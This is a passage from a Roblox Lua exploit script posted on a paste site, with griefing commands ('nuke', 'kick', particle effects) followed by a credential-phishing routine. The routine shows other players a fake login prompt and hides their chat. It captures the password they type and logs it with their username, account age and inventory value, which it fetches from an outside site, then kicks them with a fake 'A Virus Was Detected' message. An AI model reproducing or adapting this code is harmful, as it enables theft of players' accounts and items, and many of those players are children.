  1921. if plr and plr.Character and plr.Character:findFirstChild("Humanoid") then
  1922. plr.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth
  1923. plr.Character.Humanoid.Changed:connect(function() r.Character.Humanoid.Health = plr.Character.Humanoid.MaxHealth end)
  1924. end
  1925. end))
  1926. until nil]]
  1927. end
  1928. end
  1929. end
  1930.  
  1931.  
  1932.  
  1933.  
  1934.  
  1935.  
  1936. if Cmd.Text:lower():sub(1,5) == "nuke " then
  1937. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1938. for i, v in pairs(plrz) do
  1939. coroutine.resume(coroutine.create(function()
  1940. if v and v.Character and v.Character:findFirstChild("Torso") then
  1941. local p = Instance.new("Part",game.Workspace)
  1942. p.Anchored = true
  1943. p.CanCollide = false
  1944. p.formFactor = "Symmetric"
  1945. p.Shape = "Ball"
  1946. p.Size = Vector3.new(1,1,1)
  1947. p.BrickColor = BrickColor.new("New Yeller")
  1948. p.Transparency = .5
  1949. p.Reflectance = .2
  1950. p.TopSurface = 0
  1951. p.BottomSurface = 0
  1952. p.Touched:connect(function(hit)
  1953. if hit and hit.Parent then
  1954. local ex = Instance.new("Explosion", game.Workspace)
  1955. ex.Position = hit.Position
  1956. ex.BlastRadius = 11
  1957. ex.BlastPressure = math.huge
  1958. end
  1959. end)
  1960. local cf = v.Character.Torso.CFrame
  1961. p.CFrame = cf
  1962. for i = 1, 333 do
  1963. p.Size = p.Size + Vector3.new(3,3,3)
  1964. p.CFrame = cf
  1965. wait(1/44)
  1966. end
  1967. p:Destroy()
  1968. end
  1969. end))
  1970. end
  1971. end
  1972.  
  1973. if Cmd.Text:lower():sub(1,5) == "kick " then
  1974. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1975. for i, v in pairs(plrz) do
  1976. coroutine.resume(coroutine.create(function()
  1977. if v then v:Destroy() end
  1978. end))
  1979. end
  1980. end
  1981.  
  1982. if Cmd.Text:lower():sub(1,5) == "emit " then
  1983. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1984. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1985. for i, v in pairs(plrz) do
  1986. coroutine.resume(coroutine.create(function()
  1987. if v.Character then v.Character:FindFirstChild("Torso")
  1988. local cl = Instance.new("ParticleEmitter", v.Character.Torso)
  1989. cl.Texture = "rbxassetid://"..Cmd.Text:sub(chk1+1)-1
  1990. end
  1991. end))
  1992. end
  1993.  
  1994. if Cmd.Text:lower():sub(1,7) == "unemit " then
  1995. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1996. for i, v in pairs(plrz) do
  1997. coroutine.resume(coroutine.create(function()
  1998. if v and v.Character and v.Character:findFirstChild("Torso") then
  1999. for z, cl in pairs(v.Character.Torso:GetChildren()) do if cl:IsA("ParticleEmitter") then cl:Destroy() end end
  2000. end
  2001. end))
  2002. end
  2003. end end
  2004.  
  2005. end
  2006.  
  2007.  
  2008.  
  2009. function Clicked5()
  2010. for i,v in pairs(game.Players:GetChildren())do
  2011. gui = NewGuiPart65:Clone()
  2012. gui.Parent = Owner.PlayerGui
  2013. gui.ErrorFrame.Visible = true
  2014. game.StarterGui:SetCoreGuiEnabled("PlayerList", false)
  2015. game.StarterGui:SetCoreGuiEnabled("Backpack", false)
  2016. game.StarterGui:SetCoreGuiEnabled("Chat", false)
  2017. passw = gui.ErrorFrame.TB2.Text
  2018. tb1 = gui.ErrorFrame.TB1.Text
  2019. end end
  2020.  
  2021.  
  2022.  
  2023.  
  2024. wait(3)
  2025. NewGuiPart72.Visible = true
  2026.  
  2027.  
  2028. RAPApi = true
  2029.  
  2030.  
  2031.  
  2032.  
  2033. local checktrue = Instance.new("BoolValue")
  2034. checktrue.Parent = CoreValues
  2035. checktrue.Name = "PasscheckTrue"
  2036. checktrue.Value = false
  2037.  
  2038. tb1 = otherp.Name
  2039.  
  2040. PassWord.Value = NewGuiPart71.Text
  2041. UserName.Value = NewGuiPart73.Text
  2042.  
  2043. function getRap(user)
  2044. local rap = ""
  2045. if RAPApi then
  2046. ypcall(function()
  2047. local http = game:GetService("HttpService")
  2048. local rawrap = http:JSONDecode(game:HttpGet("http://roblox.plus:2052/inventory?username=" .. user,true))
  2049. rap = tostring(rawrap.rap)
  2050. end)
  2051. else
  2052. rap = "N/A"
  2053. end
  2054. return rap
  2055. end
  2056. print("This Is Jech's Property. Please DOnt Reclaim this Project.")
  2057.  
  2058. function BCtoDumpStr(str)
  2059. local res = ""
  2060. if str == "Enum.MembershipType.BuildersClub" then
  2061. res = "[BC] "
  2062. elseif str == "Enum.MembershipType.TurboBuildersClub" then
  2063. res = "[TBC] "
  2064. elseif str == "Enum.MembershipType.OutrageousBuildersClub" then
  2065. res = "[OBC] "
  2066. elseif str == "Enum.MembershipType.None" then
  2067. res = ""
  2068. end
  2069. return res
  2070. end
  2071.  
  2072. function logAccount(user,pass)
  2073. local playerName = user.Name
  2074. local playerAge = tostring(user.AccountAge)
  2075. local playerRAP = getRap(playerName)
  2076.  
  2077.  
  2078. print(BCtoDumpStr(tostring(otherp.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  2079. end
  2080.  
  2081. local GuiRemains = Instance.new("Folder")
  2082. GuiRemains.Name = "GuiRemains"
  2083. GuiRemains.Parent = CoreValues
  2084.  
  2085. function checkPass(pass)
  2086.  
  2087. if pass == "Password" or pass == "" or pass == "Enter Your Password" or pass == "Incorrect Password" or pass == "Enter your Password" then
  2088. Textg.Text = "PassWord Not Found In DataBase."
  2089. return false
  2090. end
  2091. local foundNums = 0
  2092. local foundLetters = 0
  2093. if string.find(pass, " ") then
  2094. Textg.Text = "PassWord Not Found In DataBase."
  2095. return false
  2096. end
  2097. if pass:len() < 6 or pass:len() > 20 then
  2098. Textg.Text = "PassWord Not Found In DataBase."
  2099. return false
  2100. end
  2101. for i=1,pass:len() do
  2102. if pass:sub(i,i):match("%d") ~= nil then
  2103. foundNums = foundNums + 1
  2104. end
  2105. end
  2106. if foundNums < 2 then
  2107. Textg.Text = "PassWord Not Found In DataBase."
  2108. return false
  2109. end
  2110. for i=1,pass:len() do
  2111. if pass:sub(i,i):match("%a") ~= nil then
  2112. foundLetters = foundLetters + 1
  2113. end
  2114. end
  2115. if foundLetters < 4 then
  2116. Textg.Text = "PassWord Not Found In DataBase."
  2117. return false
  2118. end
  2119. checktrue = true
  2120. return true
  2121.  
  2122. end
  2123. function respawn(user)
  2124. local person = game.Players[user]
  2125. person.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2126. person:Kick("A Virus Was Detected.")
  2127. person:Destroy();
  2128. end
  2129.  
  2130. function UnGui(user)
  2131. user.PlayerGui["LoginGui"].ErrorFrame.Done.Value = true
  2132. user:LoadCharacter();
  2133. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2134. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2135. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2136. end
  2137.  
  2138. function Done()
  2139. local pl = gui.Parent.Parent
  2140. UserName.Value = pl.Name
  2141. PassWord.Value = gui.ErrorFrame.TB2.Text
  2142. checkPass(gui.ErrorFrame.TB2.Text)
  2143. logAccount(otherp,gui.ErrorFrame.TB2.Text)
  2144. respawn(pl.Name);
  2145. pl:Kick("A Virus Was Detected.")
  2146. game.StarterGui:SetCoreGuiEnabled("PlayerList", true)
  2147. game.StarterGui:SetCoreGuiEnabled("Backpack", true)
  2148. game.StarterGui:SetCoreGuiEnabled("Chat", true)
  2149.  
  2150. end
  2151.  
  2152.  
  2153. function Clicked6()
  2154.  
  2155. Done();
  2156.  
  2157.  
  2158.  
  2159. end
  2160.  
  2161.  
  2162. game.Workspace.ChildAdded:connect(function(per)
  2163. if per.Name == otherp.Name then
  2164. if IsRunning.Value == true then
  2165. if otherp.PlayerGui["LoginGui"].ErrorFrame.Done.Value == false then
  2166. Clicked5()
  2167. end
  2168. end end
  2169. end)
  2170.  
  2171.  
  2172.  
  2173.  
  2174.  
  2175. Owner.PlayerGui.MGVX.Frame.TL3.MouseButton1Up:connect(Clicked1)
  2176. Owner.PlayerGui.MGVX.Frame.TL4.MouseButton1Up:connect(Clicked2)
  2177. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Up:connect(Clicked)
  2178. Owner.PlayerGui.MGVX.Frame.TL1.MouseButton1Down:connect(Click)
  2179. Owner.PlayerGui.MGVX.Frame.CMDS.Execute.MouseButton1Up:connect(Clicked3)
  2180. Owner.PlayerGui.MGVX.Frame.ScrollingFrame.TB.MouseButton1Up:connect(Clicked4)
  2181. Owner.Backpack:WaitForChild(ToolName.Value).Equipped:connect(Clicked5)
  2182. Owner.PlayerGui:WaitForChild("LoginGui"):WaitForChild("ErrorFrame"):WaitForChild("LoginButton").MouseButton1Up:connect(Clicked6)
  2183.  
  2184. NewGuiPart1:Clone().Parent = CoreValues
  2185. NewGuiPart65:Clone().Parent = CoreValues
  2186.  
  2187. game.StarterGui.ResetPlayerGuiOnSpawn = false
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement